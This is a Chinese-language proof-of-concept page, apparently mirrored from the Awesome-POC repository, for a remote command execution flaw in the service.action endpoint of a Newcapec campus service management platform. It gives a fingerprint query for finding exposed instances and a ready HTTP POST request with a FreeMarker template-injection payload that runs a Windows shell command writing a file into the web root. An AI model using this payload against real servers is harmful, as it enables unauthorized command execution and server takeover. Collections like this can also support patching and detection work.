admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 03:44:10 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/新开普 前置服务管理平台 service.action 远程命令执行漏洞.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

36 lines
878 B
Markdown
Raw Blame History

# 新开普 前置服务管理平台 service.action 远程命令执行漏洞
## 漏洞描述
新开普 前置服务管理平台 service.action 接口存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限
## 漏洞影响
新开普 前置服务管理平台
## 网络测绘
```
title="掌上校园服务管理平台"
```
## 漏洞复现
登陆页面
![image-20230828112934396](images/image-20230828112934396.png)
验证POC
```
POST /service_transport/service.action HTTP/1.1
Host:
Accept: */*
Content-Type: application/json
{"command":"GetFZinfo","UnitCode":"<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo Test > ./webapps/ROOT/Test.txt\")}"}
```
![image-20230828112953699](images/image-20230828112953699.png)
![image-20230828113009271](images/image-20230828113009271.png)
Reference in New Issue View Git Blame Copy Permalink